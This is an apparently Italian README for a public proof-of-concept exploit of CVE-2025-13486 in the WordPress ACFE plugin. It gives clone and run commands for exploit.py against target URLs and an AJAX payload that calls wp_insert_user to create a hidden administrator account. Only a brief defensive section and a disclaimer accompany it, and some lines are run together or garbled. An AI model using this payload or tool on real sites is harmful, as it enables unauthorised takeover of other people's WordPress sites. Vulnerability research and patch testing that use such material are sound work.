
Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Creazione Amministratore
Exploit proof-of-concept per CVE-2025-13486, una vulnerabilità critica nel plugin WordPress Advanced Custom Fields: Extended (ACFE) che consente l'esecuzione remota di codice portando all'escalation dei privilegi.
| Aspetto | Dettagli |
|---|---|
| CVE ID | CVE-2025-13486 |
| Plugin | Advanced Custom Fields: Extended (ACFE) |
| Tipo | Esecuzione remota di codice → Escalation dei privilegi |
| Livello di rischio | Critico |
| Versioni affette | Versioni vulnerabili di ACFE (versioni specifiche da determinare) |
| Punteggio CVSS | 9.8 CRITICO |
| Data di scoperta | 2025 |
| Autore | 0xgh057r3c0n |
⚠️ AVVERTENZA: Questo strumento è SOLO per test di sicurezza autorizzati e scopi educativi.
✅ Uso consentito:
❌ Uso vietato:
L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Ottenere sempre la corretta autorizzazione scritta prima di testare qualsiasi sistema.
print_rwp_insert_userrequests# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486
# Install dependencies
pip install requests
# Alternative: Install from requirements.txt
pip install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x exploit.py
Create a requirements.txt file:
requests>=2.25.1
python3 exploit.py --url <TARGET_URL> [OPTIONS]
python3 exploit.py --url http://target.com --verify
python3 exploit.py --url https://target.com
python3 exploit.py --url https://target.com \
--user backup_admin \
--password "P@ssw0rd123!" \
--email [email protected]
python3 exploit.py --url target.com --verify
L'exploit sfrutta una gestione impropria delle funzioni nell'endpoint acfe/form/render_form_ajax del plugin ACFE, consentendo agli aggressori di chiamare funzioni PHP arbitrarie.
1. Validazione URL → Rilevamento automatico HTTP/HTTPS
2. Estrazione nonce → Scansiona la pagina per il nonce ACF
3. Costruzione payload → Costruisce richiesta AJAX malevola
4. Esecuzione richiesta → Invia exploit al target
5. Analisi risultato → Controlla indicatori di successo
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));
// Exploit payload structure
{
"action": "acfe/form/render_form_ajax",
"nonce": "extracted_nonce",
"form[render]": "wp_insert_user",
"form[user_login]": "attacker_user",
"form[user_pass]": "attacker_pass",
"form[user_email]": "[email protected]",
"form[role]": "administrator"
}
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security
# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits
/wp-admin/admin-ajax.phpaction=acfe/form/render_form_ajaxwp_insert_user inaspettate tramite AJAX# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"
# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)Segnalare bug e problemi tramite:
CVE-2025-13486/
├── exploit.py # Main exploit script
├── README.md # This documentation
├── requirements.txt # Python dependencies
├── LICENSE # MIT License file
├── examples/ # Usage examples
│ ├── verification.txt
│ └── exploitation.txt
└── tests/ # Test scripts
├── test_verify.py
└── test_exploit.py
0xgh057r3c0n - Ricercatore di sicurezza
Questo progetto è distribuito con licenza MIT - vedere il file LICENSE per i dettagli.
Realizzato con ❤️ per la comunità della sicurezza
⚠️ Usare in modo responsabile ed etico ⚠️
| Opzione | Descrizione | Obbligatorio | Predefinito |
|---|
-u, --url | URL WordPress target | Sì | - |
--verify | Solo verifica, nessuno sfruttamento | No | False |
--user | Nome utente personalizzato per admin | No | admin_XXXXX |
--password | Password personalizzata per admin | No | 12 caratteri casuali |
--email | Email personalizzata per admin | No | [email protected] |